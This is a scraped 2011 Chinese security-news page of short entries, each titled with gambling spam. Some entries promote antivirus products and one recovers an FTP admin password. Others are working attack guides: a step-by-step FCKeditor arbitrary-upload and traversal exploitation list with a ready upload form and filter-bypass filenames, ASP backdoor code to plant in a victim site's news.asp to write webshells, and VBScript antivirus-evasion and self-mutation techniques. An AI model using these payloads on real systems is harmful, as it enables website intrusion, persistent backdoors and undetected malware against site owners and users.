/>入侵防御让病毒无法进入电脑,系统防御实时拦截程序有害行为,隔离防御可放心使用带毒播放器、电子书、算号器等风险程序。<br /><br />1秒云鉴定最新病毒极速云鉴定,比普通云鉴定技术最多快99倍时间消失了!近4亿用户组成最强云安全网络,无时差分析识别最新病毒,无需上传文件,1秒极速云鉴定,比传统云鉴定技术快99倍!<br /><br />刀片式智能5引擎架构 凌厉查杀360云查杀引擎、QVM人工智能引擎、主动防御引擎,还可搭配全球知名的Avira或BitDefender杀毒引擎。“中西医”豪华组合,凌厉查杀无死角。<br /><br />低至10M的安装包 极致轻巧让您比快更快!如此全面防御,竟然包含在仅 10M 的程序包中。对系统性能的影响更是做到了不可思议的极致轻微,即便老爷机也可轻松运行。<br /><br />国际品质的杀毒软件 国际权威测试成绩优异360杀毒是2011年唯一获得AV-C、VB100及英国西海岸实验室Checkmark三项权威认证的国产杀毒软件,“杀毒软件世界杯”AV-C中的国产软件代表。</p> [安全产品]360安全卫士5大王牌功能:木马查杀、清理插件、修复漏洞。。-啊彩彩票,万博彩票,1分11选5,瑞祥祥云app http://www.pjyuanjian.com//html/12729_1.html 西西 安全产品 2011/8/6 21:49:44 <p>一、【360安全卫士体检】</p><p><strong>1.什么是体检?</strong> <br />体检功能可以全面的检查您电脑的各项状况。体检完成后会提交给您一份优化您电脑的意见,您可以根据您的需要对电脑进行优化。也可以便捷的选择一键优化。 <br /><strong>2.为什么要体检?</strong> <br />体检可以让您快速全面的了解您的电脑,并且可以提醒您对电脑做一些必要的维护。如:木马查杀,垃圾清理,漏洞修复等。定期体检可以有效的保持您电脑的健康。 <br /><strong>3.如何进行体检?</strong> <br />您点开360安全卫士的界面,体检会自动开始进行。 </p><p><img alt="" src="https://pic.cr173.com/up/2011-8/201186214827300.jpg" /></p><p>二、【木马查杀】</p><p><strong>1.什么是木马查杀?</strong> <br />利用计算机程序漏洞侵入后窃取文件的程序程序被称为木马。木马查杀功能可以找出您电脑中疑似木马的程序并在取得您允许的情况下删除这些程序。 <br /><strong>2.为什么要查杀木马?</strong> <br />木马对您的电脑危害非常大,可能导致您包括支付宝,网络银行在内的重要账户密码丢失。木马的存在还可能导致您的隐私文件被拷贝或删除。所以及时查杀木马对安全上网来说十分重要。 <br /><strong>3.如何进行木马查杀?</strong> <br />点击进入木马查杀的界面后,您可以选择“快速扫描”“全盘扫描”和“自定义扫描”来检查您的电脑里是否存在木马程序。扫描结束后若出现疑似木马,您可以选择删除或加入信任区</p><p><img alt="" src="https://pic.cr173.com/up/2011-8/201186214829599.jpg" /></p><p>三、【清理插件】</p><p><strong>1.什么是清理插件?</strong> <br />插件是一种遵循一定规范的应用程序接口编写出来的程序。很多软件都有插件,例如在IE中,安装相关的插件后,WEB浏览器能够直接调用插件程序,用于处理特定类型的文件。过多的插件会拖慢你的电脑的速度。清理插件功能会检查你电脑中安装了哪些插件,您可以根据网友对插件的评分以及你自己的需要来选择清理哪些插件,保留哪些插件。 <br /><strong>2.为什么要清理插件?</strong> <br />过多的插件会拖慢您电脑的速度。而很多插件可能是在您不知情的情况下安装的,您有可能并不了解这些插件的用途,也并不需要这些插件。通过定期的清理插件,您可以及时的删除这些插件,保证您电脑运行的正常速度。 <br /><strong>3.如何清理插件?</strong> <br />点击进入常用—清理插件见面后,点击开始扫描,360安全卫士就会开始检查您电</p><p><img alt="" src="https://pic.cr173.com/up/2011-8/201186214838143.jpg" /></p><p>四、【修复漏洞】</p><p><strong>1.什么是系统漏洞?</strong> <br />这里的系统漏洞这里是特指您的Windows操作系统在逻辑设计上的缺陷或在编写时产生的错误。 <br /><strong>2.为什么要修补修通漏洞?</strong> <br />系统漏洞可以被不法者或者电脑黑客利用,通过植入木马、病毒等方式来攻击或控制整个电脑,从而窃取您电脑中的重要资料和信息,甚至破坏您的系统。 <br /><strong>3.如何修复?</strong> <br />可单击右下方的“重新扫描”以查看是否有需要修补的漏洞。 </p><p><img alt="" src="https://pic.cr173.com/up/2011-8/201186214842798.jpg" /></p><p>五、【电脑清理】</p><p><strong>1.什么是垃圾文件?</strong> 垃圾文件,指系统工作时所过滤加载出的剩余数据文件,虽然每个垃圾文件所占系统资源并不多,但是有一定时间没有清理时,垃圾文件会越来愈多。 <br /><strong>2.为什么要清理垃圾文件?</strong> <br />垃圾文件长时间堆积会拖慢你电脑的运行速度和上网速度,浪费硬盘空间。 <br /><strong>3.如何清理垃圾?</strong> <br />您可以勾选需要清理的垃圾文件种类并点击“开始扫描”。如果不清楚哪些文件该清理,哪些文件不该清理,可点击“推荐选择”,让360安全卫士来为您做合理的选择。 </p><p><img alt="" src="https://pic.cr173.com/up/2011-8/201186214847603.jpg" /></p><p>6、【系统修复】</p><p><strong>1、系统修复能做什么?</strong> <br />系统修复可以检查你电脑中多个关键位置是否处于正常的状态。 <br /><strong>2、遇到什么问题时可以用系统修复?</strong> <br />当你遇到浏览器主页、开始菜单、桌面图标、文件夹、系统设置等出现异常时,使用系统修复功能,可以帮你找出问题出现的原因并修复问题。 </p><p><img alt="" src="https://pic.cr173.com/up/2011-8/201186214850718.jpg" /></p> [网络安全]七夕网络传情木马“伪装”入侵 QQ电脑管家呼吁提高警惕-啊彩彩票,万博彩票,1分11选5,瑞祥祥云app http://www.pjyuanjian.com//html/12726_1.html 西西 网络安全 2011/8/6 16:05:14 <p>七夕将至,浪漫来袭。许多情侣都会通过发送祝福邮件、传情FLASH、或者个性化页面等方式向心上人表达爱意和祝福,病毒制造者及不法分子往往利用这一时机,将木马植入传情类七夕祝福类网页,诱使网民上当,获取隐私数据甚至坑骗钱财。 </p><p>据QQ电脑管家产品工程师介绍,七夕传情类挂马网页主要有电子贺卡类、电子情书类、情人缘分测试类等形式,均是在网页中嵌入恶意代码,并通过电子邮件或者互发链接广为散播。如果不加辨别随意打开此类网页,病毒就会悄悄入侵。轻则电脑被植入恶意信息,重则可导致操作系统受损,甚至丢失网银账号、网游账号等重要数据。如:去年流传甚广的“性感相册”病毒,就装扮成精美的电子贺卡,迷惑网友点击下载,不少人深受其害。</p><p>根据中国互联网信息中心CNNIC发布的第28次互联网调查热点数据报告显示,2011年上半年,44.7%的网民在使用互联网过程中遇到过病毒或木马攻击,受攻击人数达到2.17亿。“节假日已经成为当下电脑病毒传播的重要时机。”QQ电脑管家产品负责人表示,“所以,每逢佳节网络安全意识更不能松懈,一定别忘在上网时开启病毒安全防御软件。”</p><p>该负责人介绍,针对上述七夕情人节可能出现的网络安全问题,QQ电脑管家的多重安全保障系统完全能有效防护用户电脑,让情侣们放心传情。<br />● 网页防火墙功能可实时监控所在网页的活动,对于假冒网站或含有木马及恶意URL的传情网页、缘分测试网页等都可进行有效拦截,阻挡其对于系统的攻击;<br />● 下载保护功能可针对多下载通道(浏览器下载、下载工具、聊天工具文件传输等)进行实时防护,在用户下载或传输含有病毒的电子贺卡或电子情书等文件时,可及时提醒用户该文件的安全性,并给出合理的处置措施。<br /><br /><img alt="" src="https://pic.cr173.com/up/2011-8/2011861669469.jpg" /></p><p>图注:QQ电脑管家实时防护功能截图</p><p>针对七夕前网民所面临的网络安全风险,QQ电脑管家产品负责人提醒广大用户,七夕情人节时在为情人送祝福表爱意的同时,一定要提升防范意识,务必要开启安全防御软件的实时防护功能,切勿随意点开不明邮件中的链接,谨慎接收不明文件,过一个开心、甜蜜、浪漫的情人节。</p> [安全产品]QQ电脑管家成全球第一款通过英国西海岸实验室杀软评测的安全管理软件-啊彩彩票,万博彩票,1分11选5,瑞祥祥云app http://www.pjyuanjian.com//html/12725_1.html 西西 安全产品 2011/8/6 15:08:53 <p>近日,QQ电脑管家通过英国西海岸实验室(West Coast Labs)的权威认证,获得该实验室举行的国际上信息安全类产品的最高认证之一Checkmark的肯定,QQ电脑管家也因此成为全球第一款通过杀软评测的安全管理软件。<br /><br /></p><p><img alt="" src="https://pic.cr173.com/up/2011-8/201186151138941.jpg" /></p><p><br /><br />据悉,<a href="http://www.pjyuanjian.com/soft/11253.html" target="_blank">QQ电脑管家</a>是腾讯公司于2010年5月底推出的一款安全管理软件,截至目前已具有云查杀木马、系统漏洞修补、实时防护、清理插件等多项安全防护功能,成为名副其实的为电脑安全服务的“管家”。而此次由英国西海岸实验室(West Coast Labs)举行的Check Mark认证,与VB100认证、AV-C认证并称为全球三大权威认证,在世界范围内享有极高的盛誉,能够获得Check Mark的安全认证,证明<a href="http://www.pjyuanjian.com/soft/11253.html" target="_blank">QQ电脑管家</a>无论在基础安全防护还是电脑辅助管理方面,都具备极高的性能优势,堪称是目前最优质的安全管理工具之一。<br /><br />据了解,为了极大提升安全内核竞争力,<a href="http://www.pjyuanjian.com/soft/11253.html" target="_blank">QQ电脑管家</a>目前已经拥有强劲的四核木马查杀引擎,汇集了国际一流的专业杀毒引擎技术。其中,包括来自德国的小红伞(Avira)引擎,以及趋势(TrendMicro)引擎和国内行业领先的金山云查杀引擎,配合QQ电脑管家独有的腾讯云引擎,依赖腾讯与数亿用户共同打造的海量数据运营平台,24小时不间断补充最新木马样本,足以横扫最新、最顽固的各类流行木马。<br /><br />而在电脑辅助管理方面, <a href="http://www.pjyuanjian.com/soft/11253.html" target="_blank">QQ电脑管家</a>也在业内拥有多项创新亮点。首创的无线安全助手,有效防止无线蹭网的情况发生;软件搬家功能,帮助用户科学管理电脑;12层防御体系,24小时防御病毒木马黑客入侵,全面精准;5重系统优化,彻底提升电脑速度;还有转为3G用户提供的流量提醒工具,3G流量统计……为亿万网民提供了全面的安全防护和有效的电脑管理,更在2010年被艾瑞咨询评为“年度十大新锐软件”之一,获得行业的认可。 </p> [安全产品]QQ电脑管家+ 金山毒霸”强强联手套装极速查杀病毒-啊彩彩票,万博彩票,1分11选5,瑞祥祥云app http://www.pjyuanjian.com//html/12695_1.html 西西 安全产品 2011/8/4 22:07:13 <p><strong>“QQ电脑管家 + 金山毒霸猎豹版”免费极速杀毒套装<br /><br />发布日期:2011年08月03日 套装大小:749KB</strong></p><p><strong><br />下载地址:<a href="http://www.pjyuanjian.com/soft/30085.html">http://www.pjyuanjian.com/soft/30085.html</a></strong></p><p><strong>What's new:</strong><br />1. 集合国内外一流杀毒引擎技术,强劲多核查杀引擎,专业品质,查杀更彻底;<br />2. 全球首屈一指的云安全引擎以及专业病毒分析师随时待命,比传统杀毒软件快60倍的鉴定速度;<br />3. 基于云的杀毒套装,相对同类安全套装产品,系统资源占用最小。<br /><br /><img alt="" src="https://pic.cr173.com/up/2011-8/20118422852404.jpg" /><br /><br /><br /><strong>常见问题<br /><br />1. 免费极速杀毒套装如何完整、立体的保护电脑安全?<br /><br />答:</strong>免费极速杀毒套装集成了QQ电脑管家和金山毒霸猎豹版,互补优势,构建全安全防御体系,运行速度快,系统占用小,全方位保护电脑安全。<br /><br /><strong>(1)QQ电脑管家强劲四核引擎 + 实时防护七大体系,提前阻断木马等各类风险入侵电脑<br /><br /><strong>四核木马查杀引擎</strong></strong>:大大提高木马查杀能力,查杀更快更彻底。<br /><strong>系统防火墙</strong>:精选易受病毒木马侵袭的关键位置,全方位保护您的系统安全。<br /><strong>网页防火墙</strong>:有效拦截包含木马或欺诈信息的网址,保护上网安全。<br /><strong>U盘防火墙</strong>:实时监控U盘,防止病毒木马通过U盘入侵系统。<br /><strong>摄像头保护</strong>:防止摄像头被偷偷打开,保护您的隐私安全。<br /><strong>财产保镖</strong>:保护您的聊天、网购、网游等软件中的帐号及财产安全。<br /><strong><strong>下载保护</strong></strong>:检测下载文件和聊天接收文件的安全性,防止木马入侵。  <br /><strong>漏洞防火墙</strong>:自动检测系统最新漏洞,及时提醒修复。<br /><br /><strong>(2)金山毒霸猎豹版革命性杀毒体系,极速处理最新病毒<br /><br />30核云引擎</strong>:超越30倍的查杀能力,电脑却依然如飞。<br /><strong><strong>99秒云鉴定</strong></strong>:全球首屈一指的云安全引擎以及专业病毒分析师随时待命,比传统杀毒软件快60倍的鉴定速度。<br /><strong>独家边界防御</strong>:依托独家99秒极速鉴定技术,为您的电脑建立完整防线,病毒进不来了!<br /><br /><strong>2. 免费极速杀毒套装如何实现“极速”呢?<br /><br />答:</strong>“极速杀毒套装”,运行速度快,系统占用小,秒杀全新病毒,难以置信的轻巧快速。使用相近的系统资源占用,获得双重的安全保障。<br /><br /><strong>(1)系统占用小</strong><br /><br />“极速杀毒套装”是基于云的杀毒套装,系统资源占用只需增加10MB。相对同类安全套装中,系统资源占用最小。<br /><br /><strong>(2)运行速度快</strong><br /><br />“极速杀毒套装”采用边界防御,基本不占用系统资源,本地的主动防御因为结合云引擎,因此也非常轻巧。<br /><br /><strong>3. “极速杀毒套装”速度这么快,体积这么小,效果会变差吗?<br /><br />答:</strong>(1)QQ电脑管家强劲的四核木马查杀引擎,大大提高木马查杀能力,让查杀更快更彻底。<br /><br /><img alt="" src="https://pic.cr173.com/up/2011-8/20118422852131.jpg" /><br /><br />(2)金山毒霸猎豹版已经全面云端化,不需要保留本地臃肿的病毒库,不需要庞大的病毒查杀引擎。<br /><br />(3)金山毒霸猎豹版是完全基于云的杀毒软件,省去了本地复杂的病毒鉴定模块,因此极大的减少了扫描耗时。于此同时,在云端拥有30款各类病毒鉴定引擎,杀毒效果更好。<br /><br />(4)产品模块化,免费极速杀毒套装做到安装包只有基础查杀防御功能,用户可以根据自己的喜欢选择下载其他辅助功能工具。<br /><br /><img alt="" src="https://pic.cr173.com/up/2011-8/20118422852184.jpg" /> <img alt="" src="https://pic.cr173.com/up/2011-8/20118422853689.jpg" /><br /><br /><strong>4. “极速杀毒套装”采用了哪些云技术?<br /><br />答:</strong>免费极速杀毒套装采用国内外领先的云技术使得体积更小,查杀效果更好。金山云技术已获得英国西海岸三项国际认证。<br /><br /><strong>(1)QQ电脑管家软件云搜索</strong><br /><br />软件云搜索是QQ电脑管家提供的一种软件搜索服务。该服务综合了目前国内主流的软件下载网站,通过它能够跨平台搜索到各种最新应用软件。<br /><br /><strong>(2)QQ电脑管家木马云查杀</strong><br /><br />依靠腾讯庞大的数亿用户平台和强大的运营体系,QQ电脑管家木马云查杀服务能力迅速增强,专业查杀最新流行木马。<br /><br /><strong>(3)金山毒霸猎豹采用30核云引擎</strong><br /><br />超越30倍的查杀能力,电脑却依然如飞拥有30核查杀引擎意味着查杀能力数十倍于传统杀毒软件, 而配置在云端的设计体系,丝毫不占用您宝贵的电脑内存。<br /><br /><strong>(4)金山毒霸猎豹采用99秒云鉴定</strong><br /><br />比传统杀毒软件快60倍的鉴定速度,全球首屈一指的云安全引擎以及专业病毒分析师随时待命,95%以上样本实现99秒极速鉴定。</p> [黑客攻防]如何破解Gene6 FTP Server 的密码-啊彩彩票,万博彩票,1分11选5,瑞祥祥云app http://www.pjyuanjian.com//html/11222_1.html 佚名 黑客攻防 2011/8/4 11:05:48 <p>&nbsp;新一代的 FTP 服务器端软件,支持 RFC-959 标准并增强其中的某些功能,上传和下载都可以续传,实时查看运行状态,占用带宽,还有很多功能。最新发布的新版 3.0 终于加入期待已久的远程管理功能!看来 Serv-U 引以为荣的特色功能现在终于有了强有力的竞争对手啰! <br /></p><p>GENE6作为目前在网络管理员建站过程中最流行的FTP服务工具,他的使用和维护都是非常方便的,自身功能也很强大,不仅仅支持众多运行脚本还可以通过插件实现防范迅雷等入侵或资源耗尽形式的连接。然而GENE6在每次连接控制台时都需要输入管理员信息和密码,那么当我们忘记这个密码或者不小心删除了GENE6管理员帐户该如何恢复呢?今天就请各位读者跟随笔者一起学习如何找回丢失的GENE6管理员以及其密码。</p><p>{insd m=&quot;2&quot; i=&quot;12154&quot;}<br /></p><p>笔者以GENE6为例进行介绍,平时要对GENE6 FTP的设置进行修改的话必须通过GENE6管理控制台来完成,每次登录该控制台都需要我们输入管理员帐户信息与密码,那么当我们忘记这个帐户密码后该用什么方法来解决呢?笔者提供三种方法。</p><p>(如图1) </p><p><img alt="" src="https://pic.cr173.com/up/2011-8/201188441100415883.jpg" /></p><p>图1</p><p>  <strong>二,删除INI文件法:</strong></p><p>  在GENE6安装目录中有一个remote.ini的文件,该文件存储的是GENE6的管理员信息,我们可以通过编辑该文件实现破解管理员密码的目的。</p><p>  假设我们的将GENE6主程序安装在c:\program files\gene6 ftp server下,那么这个INI文件就在c:\program files\gene6 ftp server\remoteadmin目录下。(如图2)</p><p><img alt="" src="https://pic.cr173.com/up/2011-8/201188441105173367.jpg" /></p><p>&nbsp;</p><p>图2</p><p>  打开该INI文件后我们可以看到一些关于服务器的配置信息,包括IP地址绑定情况,开放的管理端口,管理员帐户是否启用,管理员帐户名称,管理员的密码等。(如图3)</p><p><img alt="" src="https://pic.cr173.com/up/2011-8/20118411541588.jpg" /></p><p>&nbsp;</p><p>图3</p><p>  我们将这个文件通过右击选择“删除”,配置文件被删除后我们就可以顺利登录GENE6的管理端了。(如图4)</p><p><img alt="" src="https://pic.cr173.com/up/2011-8/20118411542912.jpg" /></p><p>&nbsp;</p><p>图4</p><p>  在我们访问GENE6管理端时管理员登录名为administrator,密码随便输入即可,不管我们输入什么都可以顺利的连接管理控制台。(如图5)</p><p><img alt="" src="https://pic.cr173.com/up/2011-8/201188441104292498.jpg" /></p><p>图5<strong>三,编辑INI文件法:</strong></p><p>  当然直接删除之前说的remote.ini固然可以解决问题,但是很多时候我们希望能够保留之前的管理员部分设置,那么解决办法就是将这个文件备份,在需要还原配置或密码时恢复复制到原来位置即可。由于remote.ini中密码区域对应的字符是MD5加密的,所以我们只能够通过恢复或者GENE6已经生成的文件完成恢复工作。覆盖文件后我们也可以顺利的连接GENE6 FTP管理控制台。(如图6)</p><p><img alt="" src="https://pic.cr173.com/up/2011-8/201188441103464300.jpg" /></p><p>图6</p><p>  <strong>四,总结:</strong></p><p>  虽然我们提供了多个恢复密码还原管理员密码的方法,但是还是希望各位西西的读者保管好密码,减少亡羊补牢情况的发生。</p> [病毒漏洞]FCKeditor编辑器漏洞全面解析-啊彩彩票,万博彩票,1分11选5,瑞祥祥云app http://www.pjyuanjian.com//html/12624_1.html 西西 病毒漏洞 2011/8/1 14:01:05 &nbsp;第一步:查看编辑器版本<br />FCKeditor/_whatsnew.html<br />—————————————————————————————<br /><br />第二步. Version 2.2 版本<br />Apache+linux 环境下在上传文件后面加个.突破!测试通过。<br />—————————————————————————————<br /><br />第三步.Version &lt;=2.4.2 For php 在处理PHP 上传的地方并未对Media 类型进行上传文件类型的控制,导致用户上传任意文件!将以下保存为html文件,修改action地址。<br />&lt;form id=”frmUpload” enctype=”multipart/form-data”<br />action=”http://www.sitedir.com.cn/FCKeditor/editor/filemanager/upload/php/upload.php?Type=Media” method=”post”&gt;Upload a new file:&lt;br&gt;<br />&lt;input type=”file” name=”NewFile” size=”50″&gt;&lt;br&gt;<br />&lt;input id=”btnUpload” type=”submit” value=”Upload”&gt;<br />&lt;/form&gt;<br />—————————————————————————————<br /><br />第四步.FCKeditor 文件上传“.”变“_”下划线的绕过方法<br />很多时候上传的文件例如:shell.php.rar 或shell.php;.jpg 会变为shell_php;.jpg 这是新版FCK 的变化。<br />4.1:提交shell.php+空格绕过<br />不过空格只支持win 系统 *nix 是不支持的[shell.php 和shell.php+空格是2 个不同的文件 未测试。<br />4.2:继续上传同名文件可变为shell.php;(1).jpg 也可以新建一个文件夹,只检测了第一级的目录,如果跳到二级目录就不受限制。<br />—————————————————————————————<br /><br />第五步. 突破建立文件夹<br />FCKeditor/editor/filemanager/connectors/asp/connector.asp?Command=CreateFolder&amp;Type=Image&amp;CurrentFolder=%2Fshell.asp&amp;NewFolderName=z&amp;uuid=1244789975684<br />FCKeditor/editor/filemanager/browser/default/connectors/asp/connector.asp?Command=CreateFolder&amp;CurrentFolder=/&amp;Type=Image&amp;NewFolderName=shell.asp<br />—————————————————————————————<br /><br />第六步. FCKeditor 中test 文件的上传地址<br />FCKeditor/editor/filemanager/browser/default/connectors/test.html<br />FCKeditor/editor/filemanager/upload/test.html<br />FCKeditor/editor/filemanager/connectors/test.html<br />FCKeditor/editor/filemanager/connectors/uploadtest.html<br />—————————————————————————————<br /><br />第七步.常用上传地址<br />FCKeditor/editor/filemanager/browser/default/connectors/asp/connector.asp?Command=GetFoldersAndFiles&amp;Type=Image&amp;CurrentFolder=/<br />FCKeditor/editor/filemanager/browser/default/browser.html?type=Image&amp;connector=connectors/asp/connector.asp<br />FCKeditor/editor/filemanager/browser/default/browser.html?Type=Image&amp;Connector=http://www.sitedir.com.cn%2Ffckeditor%2Feditor%2Ffilemanager%2Fconnectors%2Fphp%2Fconnector.php (ver:2.6.3 测试通过)<br />JSP 版:<br />FCKeditor/editor/filemanager/browser/default/browser.html?Type=Image&amp;Connector=connectors/jsp/connector.jsp<br />注意红色部分修改为FCKeditor 实际使用的脚本语言,蓝色部分可以自定义文<br />件夹名称也可以利用../..目录遍历,紫色部分为实际网站地址。<br />—————————————————————————————<br /><br />第八步.其他上传地址<br />FCKeditor/_samples/default.html<br />FCKeditor/_samples/asp/sample01.asp<br />FCKeditor/_samples/asp/sample02.asp<br />FCKeditor/_samples/asp/sample03.asp<br />FCKeditor/_samples/asp/sample04.asp<br />一般很多站点都已删除_samples 目录,可以试试。<br />FCKeditor/editor/fckeditor.html 不可以上传文件,可以点击上传图片按钮再选择浏览服务器即可跳转至可上传文件页。<br />—————————————————————————————<br /><br />第九步.列目录漏洞也可助找上传地址<br />Version 2.4.1 测试通过<br />修改CurrentFolder 参数使用 ../../来进入不同的目录<br />/browser/default/connectors/aspx/connector.aspx?Command=CreateFolder&amp;Type=Image&amp;CurrentFolder=../../..%2F&amp;NewFolderName=shell.asp<br />根据返回的XML 信息可以查看网站所有的目录。<br />FCKeditor/editor/filemanager/browser/default/connectors/aspx/connector.aspx?Command=GetFoldersAndFiles&amp;Type=Image&amp;CurrentFolder=%2F<br />也可以直接浏览盘符:<br />JSP 版本:<br />FCKeditor/editor/filemanager/browser/default/connectors/jsp/connector?Command=GetFoldersAndFiles&amp;Type=&amp;CurrentFolder=%2F<br />—————————————————————————————<br /><br />第十步.爆路径漏洞<br />FCKeditor/editor/filemanager/browser/default/connectors/aspx/connector.aspx?Command=GetFoldersAndFiles&amp;Type=File&amp;CurrentFolder=/shell.asp<br />————————————————————————————<br /><br />第十一步. FCKeditor 被动限制策略所导致的过滤不严问题<br />影响版本: FCKeditor x.x &lt;= FCKeditor v2.4.3<br />脆弱描述:<br />FCKeditor v2.4.3 中File 类别默认拒绝上传类型:<br />html|htm|php|php2|php3|php4|php5|phtml|pwml|inc|asp|aspx|ascx|jsp|cfm|cfc|pl|bat|exe|com|dll|vbs|js|reg|cgi|htaccess|asis|sh|shtml|shtm|phtm<br />Fckeditor 2.0 &lt;= 2.2 允许上传asa、cer、php2、php4、inc、pwml、pht 后缀的文件上传后它保存的文件直接用的$sFilePath = $sServerDir . $sFileName,而没有使用$sExtension 为后缀.直接导致在win 下在上传文件后面加个.来突破[未测试]!<br />而在apache 下,因为”Apache 文件名解析缺陷漏洞”也可以利用之,另建议其他上传漏洞中定义TYPE 变量时使用File 类别来上传文件,根据FCKeditor 的代码,其限制最为狭隘。<br />在上传时遇见可直接上传脚本文件固然很好,但有些版本可能无法直接上传可以利用在文件名后面加.点或空格绕过,也可以利用2003 解析漏洞建立xxx.asp文件夹或者上传xx.asp;.jpg!<br />—————————————————————————————<br /><br />第十二步.最古老的漏洞,Type文件没有限制!<br />我接触到的第一个fckeditor漏洞了。版本不详,应该很古老了,因为程序对type=xxx 的类型没有检查。我们可以直接构造上传把type=Image 改成Type=hsren 这样就可以建立一个叫hsren的文件夹,一个新类型,没有任何限制,可以上传任意脚本! [数据库安全]巧用.mdb后缀数据库做后门的代码-啊彩彩票,万博彩票,1分11选5,瑞祥祥云app http://www.pjyuanjian.com//html/12622_1.html 西西 数据库安全 2011/8/1 13:45:50 &nbsp;我不否认n早前的那个把asp木马写到图片文件中不失为一种好的方法,其实不仅可以写到图片啦 写到mp3文件里写到doc文件里都是可以的啦<br />copy 文件名/参数 + 文件名/参数 生成文件名<br />这样的方法可以很灵活的运用来达到隐藏文件的目的,具体的参数就是/a以acsic码方式,/b二进制方式,就不罗嗦这些了,至于如何上传webshell,什么是webshell也不属于本文的讨论范围。今天要讲的是如何把后门放到后缀。mdb的数据库中,前提是在我们拿到<br />一个webshell之后…<br />我们所知道的,很多站点在用户注册的时候要让填好多东西例如:<br />用户名、密码、qq、邮箱、个人简介、电话、联系方式、住址一类的<br />而对应到数据库中也都会有相应的表 字段 值<br />我今天要做的就是 我注册一个用户在 我的个人简介的地方上写入shell代码,然后修改他站点上的一个文件,使用的时候触发这个文件,就把我个人简历中的shell代码,备份到当前目录下<br />废话少说了 大家看代码<br />&lt;%<br />if request(“action”)=“firefox” then<br />fname=request.querystring(“fn”)<br />tname=request.querystring(“tn”)<br />bname=request.querystring(“bn”)<br />id=request.querystring(“id”)<br />idvalue=request.querystring(“idv”)<br />set rs=server.createobject(“ADODB.recordset”)<br />sql=“select ”&amp; bname &amp; “ from ”&amp;tname&amp; “ where ”&amp;id&amp;“=”&amp;idvalue&amp;“”“”<br />rs.open sql,conn,1,3<br />if not rs.eof then<br />content=rs(bname)<br />else<br />response.write “Nothing”<br />end if<br />set fso=Server.CreateObject(“Scripting.FileSystemObject”)<br />set txtfile=fso.createtextfile(server.mappath(fname))<br />txtfile.writeline(content)<br />txtfile.close<br />end if<br />%&gt;<br />将上边的代码加到站点的一个文件中 如news.asp<br />根据我们了解的信息 在其站点注册后 下载数据库看结构<br />我注册的firefox名字是在 user表 其id值为119 用于存放我注册简历的表字段为jl<br />那么在使用的时候我们<br />news.asp?action=firefox&amp;fn=firefox.asp&amp;tn=user&amp;bn=jl&amp;id=id&amp;idv=119<br />就可以在news.asp相同目录下写入一个名为 firefox.asp的webshell<br />以上可以说是万千隐藏方法中的一种 下边再说另外一种更方便的隐藏方法<br />这个方法就和mdb后缀无关系了<br />同样我们还是修改news.asp 将以下代码插入到对方news.asp中<br />&lt;%<br />if request(“action”)=“firefox” then<br />n=request.form(“n”)<br />c=request.form(“c”)<br />set fso=Server.CreateObject(“Scripting.FileSystemObject”)<br />set txtfile=fso.createtextfile(server.mappath(n))<br />txtfile.writeline(c)<br />txtfile.close<br />end if<br />%&gt;<br />这段代码相对简单些 算是一个木马的服务端吧。引言:好长时间了,从刚开始的站点管理器到现在流行的几款asp后门,相信大多网管都能说出这些经典webshell的名字,如海洋、老兵、蓝屏等,也相信大多数的网管学会了关键字的搜索方法来搜索这些木马,当然现在的时间如果再象隐藏后门就要讲些技巧啦,俗话说的好“佛高一尺,我高一丈”。 [防护教程]反黑卫士教你认识VBS病毒躲避杀毒软件的常用伎俩-啊彩彩票,万博彩票,1分11选5,瑞祥祥云app http://www.pjyuanjian.com//html/12576_1.html 反黑卫士 防护教程 2011/7/29 10:31:15 &nbsp;VBS脚本(visual basic scripting edition)的简写,它以Wsh(windows脚本宿主)为依托。借助windows提供的强大功能,成为计算机应用中强有力的工具。但是很多人利用它的强大功能编写破坏性代码构造恶意程序。对VBS脚本病毒的防治必须建立在对它了解的基础上。现在介绍本人对VBS病毒自我保护机制的认识给大家分享。以便更多的人能自己动手处理vbs病毒。<br /><br />1、改变对象的声明方式<br /><br />譬如fso=createobject(&quot;scripting.filesystemobject&quot;),我们将其改变为 <br />fso=createobject(&quot;script&quot;+&quot;ing.filesyste&quot;+&quot;mobject&quot;),这样反病毒软件对其进行静态扫描时就不会发现filesystemobject对象。 <br /><br />2、利用Execute函数 <br />巧妙运用Execute方法可以有效防治杀毒软件查杀。很多杀毒软件检测VBS病毒时,会检查程序中是否声明使用了FileSystemObject对象,如果采用了,这会发出报警。如果病毒将这段声明代码转化为字符串,然后通过Execute(String)函数执行,就可以躲避某些<br /><br />反病毒软件。 <br /><br />3、代码动态变化<br /><br />下面引用一个网上代码变化引擎的例子说明<br /><br />Randomize<br />Set Of = CreateObject(&quot;Scripting.FileSystemObject&quot;) <br />’创建文件系统对象<br />vC = Of.OpenTextFile(WScript.ScriptFullName, 1).Readall<br />’读取自身代码<br />fS=Array(&quot;Of&quot;, &quot;vC&quot;, &quot;fS&quot;, &quot;fSC&quot;) <br />’定义一个即将被替换字符的数组<br />For fSC = 0 To 3<br />vC = Replace(vC, fS(fSC), Chr((Int(Rnd * 22) + 65))<br />&amp; Chr((Int(Rnd * 22) + 65)) &amp; Chr((Int(Rnd * 22) + 65))<br />&amp; Chr((Int(Rnd * 22) + 65))) <br />’取4个随机字符替换数组fS中的字符串<br />Next<br />Of.OpenTextFile(WScript.ScriptFullName, 2, 1).Writeline vC <br />’将替换后的代码写回文件<br /><br />以上就是VBS脚本躲避杀软的主要手段 [安全产品]U盘杀毒精灵---发展过程中几个典型版本回顾-啊彩彩票,万博彩票,1分11选5,瑞祥祥云app http://www.pjyuanjian.com//html/12575_1.html 反黑战士 安全产品 2011/7/29 10:28:53 <p><strong>第一阶段:</strong>批处理时期</p><p>作者在西南石油大学读书期常帮助同学清理U盘里的病毒。工作虽然简单但是无休止的重复总会让人厌烦!于是编写了一个辅助删除U盘里病毒的批处理文件,代码只有两行:一行用来显示U盘中所有的隐藏对象;另一行用来创建一个空的autorun.inf文件夹。后来发展成一个可以自动清理U盘中Auto病毒的工具。</p><p>下图中简陋抽象的面孔就是最早的批处理版本U盘杀毒精灵!</p><p><br /><img alt="" src="https://pic.cr173.com/up/2011-7/2011729102858856.jpg" /><br /><br /><br /><br /><strong>第二阶段:</strong>VB做外壳,核心从批处理到VbScript再到多种代码混合时期!</p><p>这个时期的“U盘杀毒精灵”相对纯批处理代码时期已经算是一个不小的进步了。现在想想当时的病毒判断逻辑虽然有点山寨,但是却可以识别U盘中绝大多数的病毒活体!</p><p><br /><img alt="" src="https://pic.cr173.com/up/2011-7/2011729102858723.jpg" /> 